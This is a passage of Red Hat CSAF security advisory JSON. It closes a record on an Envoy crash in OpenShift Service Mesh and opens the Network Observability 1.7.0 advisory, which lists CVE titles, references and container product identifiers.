"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7726"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:239b42c643b37c7aa7de38e9eeb00222e9dcc8e96b845307c73ecb48ec8f6175_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/grafana-rhel8@sha256:a50a14787a8765c1c9da772d58d08138cacb29ba41e32bc3f5c0ff9b8452d40b_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:3c5142ebe3cb9c77b67c29fd7a6fb6b5176ace9833f69aaebec658b4ca8232ad_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-cni-rhel8@sha256:fb11daf6c17ea22d9b80af3f2b48807a00e73a347e081f046beb5707923ea976_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:92965aba07c6c3ae594fa30f72b47692b9692639f47882d3a29b1fe3938f1325_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-must-gather-rhel8@sha256:c00a763b4b037c92378363a29e55c057fd1ae5e7efaded6ca6e53c4be1c13404_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:3c87f98e0b065af6bd93090edaa2187218dbed286f712a56daefad5a2bd124ae_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:bd7006b966f6d367bc1814750c1465f7ffb9e39fc2fb7d3607d11dabc77115d6_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:2050b64b6d66ba3c4a068311ab1737219c318ec4f9e4b07cc33fecf47c3b6795_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:276689457eada53dacecf65a92bf64a7535add94c728b165771bc27e3b10009c_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:5c6810907b68548ca4d79b6d07e9b936ce74e4efbd2e39e225793bce1d15e1d9_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8-operator@sha256:b28f8f238dfa4dc4590fe326ef1c0db17238dda3640a0e9fdf8fb93a69b4e0c3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:37bb32758dbda228f036d2b0cb3cf7010926334f9ebc82bebf0cac5c397c9bd3_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:acab16ff4de53601dd13971b5165f5ca6ba68345be9a2135469e246d385243cc_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:871eff21377954f22da7aded97f65dbb1d9ed8cfdd33c29b790609e36b0bdeec_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:931c5faa35bc2200fa595ea418e861c6ca8c8bcda34821aa0592565c7873415a_s390x",
"8Base-RHOSSM-2.6:openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:a224fe00e59b8e7c85d479bc3962e81ba274ef3be4b2aee55e56534f4d03aa32_amd64",
"8Base-RHOSSM-2.6:openshift-service-mesh/ratelimit-rhel8@sha256:c4fcdfa308b9995044e0daab35916b3e85dc94dd30131a9410652dcf23e8e27f_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:19b29793f5615cd360e83e736471175db4dc205ae33f3914b28d41502036e655_amd64",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:56cdb7f7540a76bf10235d4c3048ef99d8d8602b8420f16a03ef7d446c18df87_s390x",
"9Base-RHOSSM-2.6:openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "envoy: Envoy crashes for `LocalReply` in HTTP async client"
}
]
}
RHSA-2024_8014
Vulnerability from csaf_redhat - Published: 2024-10-22 01:05 - Updated: 2024-12-18 04:39Summary
Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift
Notes
Topic
Network Observability 1.7 for Red Hat OpenShift
Red Hat Product Security has rated this update as having a security impact of
Important. A Common Vulnerability Scoring System (CVSS) base score, which gives
a detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Network Observability 1.7.0
Security Fix(es):
* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)
* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)
* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)
* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)
* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)
* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)
* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)
* Network Observability: Calling Parse on a "// +build" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Network Observability 1.7 for Red Hat OpenShift\n\nRed Hat Product Security has rated this update as having a security impact of\nImportant. A Common Vulnerability Scoring System (CVSS) base score, which gives\na detailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Network Observability 1.7.0\n\nSecurity Fix(es):\n\n* Network Observability: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* Network Observability: XSS vulnerability via prototype pollution (CVE-2024-45801)\n* Network Observability: axios: Server-Side Request Forgery (CVE-2024-39338)\n* Network Observability: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* Network Observability: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule (CVE-2024-43788)\n* Network Observability: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* Network Observability: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* Network Observability: Improper Sanitization in serve-static (CVE-2024-43800)\n* Network Observability: Calling Decoder.Decode on a message which contains deeply nested structures can cause a panic due to stack exhaustion (CVE-2024-34156)\n* Network Observability: Calling any of the Parse functions containing deeply nested literals can cause a panic/stack exhaustion (CVE-2024-34155)\n* Network Observability: Calling Parse on a \"// +build\" build tag line with deeply nested expressions can cause a panic due to stack exhaustion (CVE-2024-34158)",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8014",
"url": "https://access.redhat.com/errata/RHSA-2024:8014"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2310527",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310527"
},
{
"category": "external",
"summary": "2310528",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310528"
},
{
"category": "external",
"summary": "2310529",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310529"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "NETOBSERV-1377",
"url": "https://issues.redhat.com/browse/NETOBSERV-1377"
},
{
"category": "external",
"summary": "NETOBSERV-1509",
"url": "https://issues.redhat.com/browse/NETOBSERV-1509"
},
{
"category": "external",
"summary": "NETOBSERV-1538",
"url": "https://issues.redhat.com/browse/NETOBSERV-1538"
},
{
"category": "external",
"summary": "NETOBSERV-1540",
"url": "https://issues.redhat.com/browse/NETOBSERV-1540"
},
{
"category": "external",
"summary": "NETOBSERV-1564",
"url": "https://issues.redhat.com/browse/NETOBSERV-1564"
},
{
"category": "external",
"summary": "NETOBSERV-163",
"url": "https://issues.redhat.com/browse/NETOBSERV-163"
},
{
"category": "external",
"summary": "NETOBSERV-1666",
"url": "https://issues.redhat.com/browse/NETOBSERV-1666"
},
{
"category": "external",
"summary": "NETOBSERV-1667",
"url": "https://issues.redhat.com/browse/NETOBSERV-1667"
},
{
"category": "external",
"summary": "NETOBSERV-1733",
"url": "https://issues.redhat.com/browse/NETOBSERV-1733"
},
{
"category": "external",
"summary": "NETOBSERV-1746",
"url": "https://issues.redhat.com/browse/NETOBSERV-1746"
},
{
"category": "external",
"summary": "NETOBSERV-1748",
"url": "https://issues.redhat.com/browse/NETOBSERV-1748"
},
{
"category": "external",
"summary": "NETOBSERV-1753",
"url": "https://issues.redhat.com/browse/NETOBSERV-1753"
},
{
"category": "external",
"summary": "NETOBSERV-1766",
"url": "https://issues.redhat.com/browse/NETOBSERV-1766"
},
{
"category": "external",
"summary": "NETOBSERV-1779",
"url": "https://issues.redhat.com/browse/NETOBSERV-1779"
},
{
"category": "external",
"summary": "NETOBSERV-1783",
"url": "https://issues.redhat.com/browse/NETOBSERV-1783"
},
{
"category": "external",
"summary": "NETOBSERV-1788",
"url": "https://issues.redhat.com/browse/NETOBSERV-1788"
},
{
"category": "external",
"summary": "NETOBSERV-1798",
"url": "https://issues.redhat.com/browse/NETOBSERV-1798"
},
{
"category": "external",
"summary": "NETOBSERV-1805",
"url": "https://issues.redhat.com/browse/NETOBSERV-1805"
},
{
"category": "external",
"summary": "NETOBSERV-1806",
"url": "https://issues.redhat.com/browse/NETOBSERV-1806"
},
{
"category": "external",
"summary": "NETOBSERV-1808",
"url": "https://issues.redhat.com/browse/NETOBSERV-1808"
},
{
"category": "external",
"summary": "NETOBSERV-1811",
"url": "https://issues.redhat.com/browse/NETOBSERV-1811"
},
{
"category": "external",
"summary": "NETOBSERV-1812",
"url": "https://issues.redhat.com/browse/NETOBSERV-1812"
},
{
"category": "external",
"summary": "NETOBSERV-1813",
"url": "https://issues.redhat.com/browse/NETOBSERV-1813"
},
{
"category": "external",
"summary": "NETOBSERV-1816",
"url": "https://issues.redhat.com/browse/NETOBSERV-1816"
},
{
"category": "external",
"summary": "NETOBSERV-1819",
"url": "https://issues.redhat.com/browse/NETOBSERV-1819"
},
{
"category": "external",
"summary": "NETOBSERV-1848",
"url": "https://issues.redhat.com/browse/NETOBSERV-1848"
},
{
"category": "external",
"summary": "NETOBSERV-1884",
"url": "https://issues.redhat.com/browse/NETOBSERV-1884"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8014.json"
}
],
"title": "Red Hat Security Advisory: Network Observability 1.7.0 for OpenShift",
"tracking": {
"current_release_date": "2024-12-18T04:39:27+00:00",
"generator": {
"date": "2024-12-18T04:39:27+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2024:8014",
"initial_release_date": "2024-10-22T01:05:39+00:00",
"revision_history": [
{
"date": "2024-10-22T01:05:39+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-22T01:05:39+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-18T04:39:27+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "NETOBSERV 1.7 for RHEL 9",
"product": {
"name": "NETOBSERV 1.7 for RHEL 9",
"product_id": "9Base-NETWORK-OBSERVABILITY-1.7.0",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:network_observ_optr:1.7.0::el9"
}
}
}
],
"category": "product_family",
"name": "Network Observability"
},
{
"branches": [
{
"category": "product_version",
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product": {
"name": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_id": "network-observability/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-cli-rhel9@sha256:7c2c2c0c0c255c1ef1579b63337d35174a330374a7deaff3c3c1e39ff48e89ee?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-cli-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product": {
"name": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_id": "network-observability/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/network-observability-console-plugin-rhel9@sha256:10d159c57623d2e098b401331de93d8d591b78e133785dea89d9694ee76ded0f?arch=amd64\u0026repository_url=registry.redhat.io/network-observability/network-observability-console-plugin-rhel9\u0026tag=v1.7.0-67"
}
}
},
{
"category": "product_version",
"name": "network-observability/network-observability-ebpf-agent-rhel9@sha256:e979023e2e93f1ada9e3fd3e1268b39b4ac1fb9fe51357462e2ac7ddc8c49056_amd64",
"product": {
